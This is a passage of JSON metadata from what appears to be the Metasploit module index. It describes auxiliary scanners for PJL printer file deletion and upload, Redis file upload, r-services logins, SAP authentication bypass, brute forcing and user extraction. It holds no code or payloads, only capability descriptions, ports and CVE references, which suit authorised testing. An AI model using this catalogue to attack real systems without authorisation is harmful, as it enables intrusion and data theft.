"description": "This module deletes a file on a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_delete_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_download_file": {
"name": "Printer File Download Scanner",
"full_name": "auxiliary/scanner/printer/printer_download_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module downloads a file from a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_download_file.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_download_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_env_vars": {
"name": "Printer Environment Variables Scanner",
"full_name": "auxiliary/scanner/printer/printer_env_vars",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni"
],
"description": "This module scans for printer environment variables using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 21:02:39 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_env_vars",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_list_dir": {
"name": "Printer Directory Listing Scanner",
"full_name": "auxiliary/scanner/printer/printer_list_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module lists a directory on a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_list_dir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_list_volumes": {
"name": "Printer Volume Listing Scanner",
"full_name": "auxiliary/scanner/printer/printer_list_volumes",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module lists the volumes on a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 21:02:39 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_list_volumes",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_ready_message": {
"name": "Printer Ready Message Scanner",
"full_name": "auxiliary/scanner/printer/printer_ready_message",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module scans for and optionally changes the printer ready message on\n a set of printers using the Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_ready_message",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_upload_file": {
"name": "Printer File Upload Scanner",
"full_name": "auxiliary/scanner/printer/printer_upload_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module uploads a file to a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_upload_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_version_info": {
"name": "Printer Version Information Scanner",
"full_name": "auxiliary/scanner/printer/printer_version_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module scans for printer version information using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_version_info.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_version_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/quake/server_info": {
"name": "Gather Quake Server Information",
"full_name": "auxiliary/scanner/quake/server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module uses the getstatus or getinfo request to obtain\n information from a Quake server.",
"references": [
"URL-ftp://ftp.idsoftware.com/idstuff/quake3/docs/server.txt"
],
"platform": "",
"arch": "",
"rport": 27960,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/quake/server_info.rb",
"is_install_path": true,
"ref_name": "scanner/quake/server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rdp/ms12_020_check": {
"name": "MS12-020 Microsoft Remote Desktop Checker",
"full_name": "auxiliary/scanner/rdp/ms12_020_check",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis \"R3dy\" <rdavis@accuvant.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "This module checks a range of hosts for the MS12-020 vulnerability.\n This does not cause a DoS on the target.",
"references": [
"CVE-2012-0002",
"MSB-MS12-020",
"URL-http://technet.microsoft.com/en-us/security/bulletin/ms12-020",
"EDB-18606",
"URL-https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse"
],
"platform": "",
"arch": "",
"rport": 3389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/rdp/ms12_020_check.rb",
"is_install_path": true,
"ref_name": "scanner/rdp/ms12_020_check",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rdp/rdp_scanner": {
"name": "Identify endpoints speaking the Remote Desktop Protocol (RDP)",
"full_name": "auxiliary/scanner/rdp/rdp_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module attempts to connect to the specified Remote Desktop Protocol port\n and determines if it speaks RDP.",
"references": [
"URL-https://msdn.microsoft.com/en-us/library/cc240445.aspx"
],
"platform": "",
"arch": "",
"rport": 3389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-09 21:32:15 +0000",
"path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/rdp/rdp_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/redis/file_upload": {
"name": "Redis File Upload",
"full_name": "auxiliary/scanner/redis/file_upload",
"rank": 300,
"disclosure_date": "2015-11-11",
"type": "auxiliary",
"author": [
"Nixawk",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can be used to leverage functionality exposed by Redis to\n achieve somewhat arbitrary file upload to a file and directory to\n which the user account running the redis instance has access. It is\n not totally arbitrary because the exact contents of the file cannot\n be completely controlled given the nature of how Redis stores its\n database on disk.",
"references": [
"URL-http://antirez.com/news/96",
"URL-http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/",
"URL-http://redis.io/topics/protocol"
],
"platform": "",
"arch": "",
"rport": 6379,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/redis/file_upload.rb",
"is_install_path": true,
"ref_name": "scanner/redis/file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/redis/redis_login": {
"name": "Redis Login Utility",
"full_name": "auxiliary/scanner/redis/redis_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module attempts to authenticate to a Redis service.",
"references": [
"URL-http://redis.io/topics/protocol"
],
"platform": "",
"arch": "",
"rport": 6379,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/redis/redis_login.rb",
"is_install_path": true,
"ref_name": "scanner/redis/redis_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/redis/redis_server": {
"name": "Redis Command Execute Scanner",
"full_name": "auxiliary/scanner/redis/redis_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"iallison <ian@team-allison.com>",
"Nixawk"
],
"description": "This module locates Redis endpoints by attempting to run a specified\n Redis command.",
"references": [
],
"platform": "",
"arch": "",
"rport": 6379,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/redis/redis_server.rb",
"is_install_path": true,
"ref_name": "scanner/redis/redis_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rogue/rogue_recv": {
"name": "Rogue Gateway Detection: Receiver",
"full_name": "auxiliary/scanner/rogue/rogue_recv",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module listens for replies to the requests sent by\n the rogue_send module. The RPORT, CPORT, and ECHOID values\n must match the rogue_send parameters used exactly.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/rogue/rogue_recv.rb",
"is_install_path": true,
"ref_name": "scanner/rogue/rogue_recv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rogue/rogue_send": {
"name": "Rogue Gateway Detection: Sender",
"full_name": "auxiliary/scanner/rogue/rogue_send",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of TCP SYN and ICMP ECHO requests\n to each internal target host, spoofing the source address of an external\n system running the rogue_recv module. This allows the system running\n the rogue_recv module to determine what external IP a given internal\n system is using as its default route.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/rogue/rogue_send.rb",
"is_install_path": true,
"ref_name": "scanner/rogue/rogue_send",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rservices/rexec_login": {
"name": "rexec Authentication Scanner",
"full_name": "auxiliary/scanner/rservices/rexec_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will test an rexec service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).",
"references": [
"CVE-1999-0651",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 512,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
"is_install_path": true,
"ref_name": "scanner/rservices/rexec_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rservices/rlogin_login": {
"name": "rlogin Authentication Scanner",
"full_name": "auxiliary/scanner/rservices/rlogin_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will test an rlogin service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).",
"references": [
"CVE-1999-0651",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 513,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
"is_install_path": true,
"ref_name": "scanner/rservices/rlogin_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rservices/rsh_login": {
"name": "rsh Authentication Scanner",
"full_name": "auxiliary/scanner/rservices/rsh_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will test a shell (rsh) service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).",
"references": [
"CVE-1999-0651",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
"is_install_path": true,
"ref_name": "scanner/rservices/rsh_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rsync/modules_list": {
"name": "List Rsync Modules",
"full_name": "auxiliary/scanner/rsync/modules_list",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ikkini",
"Jon Hart <jon_hart@rapid7.com>",
"Nixawk"
],
"description": "An rsync module is essentially a directory share. These modules can\n optionally be protected by a password. This module connects to and\n negotiates with an rsync server, lists the available modules and,\n optionally, determines if the module requires a password to access.",
"references": [
"URL-http://rsync.samba.org/ftp/rsync/rsync.html"
],
"platform": "",
"arch": "",
"rport": 873,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/rsync/modules_list.rb",
"is_install_path": true,
"ref_name": "scanner/rsync/modules_list",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_ctc_verb_tampering_user_mgmt": {
"name": "SAP CTC Service Verb Tampering User Management",
"full_name": "auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexandr Polyakov",
"nmonkee"
],
"description": "This module exploits an authentication bypass vulnerability in SAP NetWeaver\n CTC service. The service is vulnerable to verb tampering allowing for unauthorised\n OS user management. Information about resolution should be available at SAP notes\n 1589525 and 1624450 (authentication required).",
"references": [
"URL-http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/",
"URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_ctc_verb_tampering_user_mgmt",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_hostctrl_getcomputersystem": {
"name": "SAP Host Agent Information Disclosure",
"full_name": "auxiliary/scanner/sap/sap_hostctrl_getcomputersystem",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bruno Morisson <bm@integrity.pt>"
],
"description": "This module attempts to retrieve Computer and OS info from Host Agent\n through the SAP HostControl service.",
"references": [
"CVE-2013-3319",
"OSVDB-95616",
"BID-61402",
"URL-https://service.sap.com/sap/support/notes/1816536",
"URL-http://labs.integrity.pt/advisories/cve-2013-3319/"
],
"platform": "",
"arch": "",
"rport": 1128,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
1128
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_hostctrl_getcomputersystem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_icf_public_info": {
"name": "SAP ICF /sap/public/info Service Sensitive Information Gathering",
"full_name": "auxiliary/scanner/sap/sap_icf_public_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee",
"ChrisJohnRiley"
],
"description": "This module uses the /sap/public/info service within SAP Internet Communication\n Framework (ICF) to obtain the operating system version, SAP version, IP address\n and other information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_icf_public_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_icm_urlscan": {
"name": "SAP URL Scanner",
"full_name": "auxiliary/scanner/sap/sap_icm_urlscan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module scans for commonly found SAP Internet Communication Manager URLs\n and outputs return codes for the user.",
"references": [
"CVE-2010-0738"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_icm_urlscan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_abaplog": {
"name": "SAP Management Console ABAP Syslog Disclosure",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_abaplog",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_abaplog",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_brute_login": {
"name": "SAP Management Console Brute Force",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_brute_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to brute force the username and\n password for the SAP Management Console SOAP Interface. If\n the SAP_SID value is set it will replace instances of <SAPSID>\n in any user/pass from any wordlist.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_brute_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_extractusers": {
"name": "SAP Management Console Extract Users",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_extractusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to extract SAP users from the ABAP\n Syslog through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_extractusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getaccesspoints": {
"name": "SAP Management Console Get Access Points",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to output a list of SAP access points through the\n SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getenv": {
"name": "SAP Management Console getEnvironment",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getenv",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to identify SAP Environment\n settings through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getenv",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getlogfiles": {
"name": "SAP Management Console Get Logfile",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getlogfiles",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Bruno Morisson <bm@integrity.pt>"
],
"description": "This module simply attempts to download available logfiles and\n developer tracefiles through the SAP Management Console SOAP\n Interface. Please use the sap_mgmt_con_listlogfiles\n extension to view a list of available files.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getprocesslist": {
"name": "SAP Management Console GetProcessList",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getprocesslist",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Bruno Morisson <bm@integrity.pt>"
],
"description": "This module attempts to list SAP processes through the SAP Management Console SOAP Interface",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getprocessparameter": {
"name": "SAP Management Console Get Process Parameters",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to output SAP process parameters and\n configuration settings through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_instanceproperties": {
"name": "SAP Management Console Instance Properties",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_instanceproperties",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to identify the instance properties\n through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_listconfigfiles": {
"name": "SAP Management Console List Config Files",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Jacobo Avariento Gimeno"
],
"description": "This module attempts to list the config files\n through the SAP Management Console SOAP Interface.\n Returns a list of config files found in the SAP configuration with their\n absolute paths inside the server filesystem.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_listlogfiles": {
"name": "SAP Management Console List Logfiles",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_listlogfiles",
"rank": 300,
"disclosure_date": null,
